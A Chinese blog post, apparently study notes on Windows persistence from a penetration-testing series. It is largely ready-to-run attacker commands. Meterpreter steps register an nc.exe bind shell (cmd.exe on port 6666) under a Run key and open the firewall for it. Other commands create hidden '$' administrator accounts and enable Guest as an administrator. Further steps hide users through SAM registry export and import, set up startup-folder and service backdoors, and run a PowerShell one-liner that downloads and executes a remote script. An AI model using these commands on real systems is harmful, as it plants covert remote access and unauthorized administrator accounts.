Windows权限维持(2)|内网渗透学习(十一)

Windows权限维持(2)|内网渗透学习(十一)

开机自启动注册表项服务后门都已经在前面使用过了, 主要看后门用户的添加和隐藏, 以及文件夹自启动powershell脚本添加后门

开机自启动注册表项

nc后门

下面操作直接在meterpreter命令行执行:

uplaod /tmp/nc.exe C:\\windows\\systen32

reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\currentversion\\run

reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\currentversion\\run -v nc -d 'C:\windows\systen32\nc.exe -Ldp 6666 -e cmd.exe'

reg queryval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\currentversion\\run -v nc

注意这里的nc开启的是正向等待连接而不是直接反弹, 下面是注册表设置的简单示例, 设置表项后又删除掉

image-20221001232146243

正向连接更容易被防火墙检测拦截, 可以执行下面操作为等待正向的6666端口开放, 关闭防火墙对6666的检测

execute -f cmd -i -H 
netsh firewall 
show opmode
netsh firewall add portopening TCP 6666 "QQ" ENABLE ALL
shutdown -r -f -t 0

账户隐藏

隐藏用户

添加一个隐藏用户admin2并且将其添加到administrators用户组中

net user admin2$ password /add && net localgroup administrators admin2$ /add

image-20221001233305741

注意这个隐藏账户只是不能通过net user显示而已, 但是在控制面板的管理账户中还是可以直接看到这个用户的

image-20221001234152056

激活Guest用户

将访客用户guest添加到administrators用户组并且将其启用

net user guest Admin@hacker && net localgroup administrators guest /add
net user guest /active:yes

后门账号

可以通过创建一个克隆的administrator账号, 且通过命令net user以及控制面板的管理账户中都无法看到

使用$创建匿名用户, 并柜到administrators用户组

net user defaultuser0$ password /add /y

net localgroup administrators defaultuser0$ /add

net localgroup "remote desktop users" defaultuser0$ /add

创建的defaultuser0$账号既不能通过net user看到也不能通过net user defaultuser0$看到, 但是我们可以通过net localgroup administrators查看用户组所属用户找到defaultuser0$, 同时也还是可以在控制面板找到用户

image-20221001234717427

image-20221001234904726

image-20221001235446071

注册表导入用户

查找导出用户的注册表

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator
  1. 注册表HKEY_LOCAL_MACHINE\SAM\SAM默认情况下administrator用户是没有完全控制权限的, 但是我们可以通过右键修改注册表的用户权限给administrator用户添加完全控制权限
  2. HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下面有每个用户对应一个注册表, 里面的数据只有一个十六进制的值, 这个值标明了账户信息存储在哪一个表中, 例如里面的值是abc那么用户信息就在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000abc

导入注册表

我们如果想要对admin用户进行操作

image-20221002000905937

将这两个注册表导出

image-20221002001126131

然后删除admin用户

image-20221002001440196

此时注册表已经没有admin用户的数据了而且net user和控制面板都是找不到admin的数据了的, 已经被彻底删除

这时候我们可以将用户数据直接导入到注册表中,

image-20221002002208425

注意这里我先使用我自己administrator用户组的h0cksr导入是失败了的, 显示加载错误, 然后转到msf使用system权限导入也还是会弹窗显示失败, 不过发现多确认几次就好了, 虽然还是显示失败但是注册表是被成功导入了的

image-20221002002702645

直接输入命令net user可以看到用户存在, 但是在控制面板中就看不到admin用户(教程里面是两个地方都看不到用户的)

文件夹启动

在每次开机或重后的时候就会运行后动文件夹下的程序, 这个也是很明显的, 几乎是直接暴露, 很容易被发现

C:\Users\{UserNameAppData}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

服务后门

sc create [ServerName] binPath = BinaryPathName

重后权限维持·但一般杀软会拦截

Task-Powershell

这就是一种实现方式, 执行powershell脚本

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://vps/xxx.ps1').xxxxxxxxx"

这只是一个格式而已, 具体的实现还要看.ps1脚本

2022_10_02 03:00

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇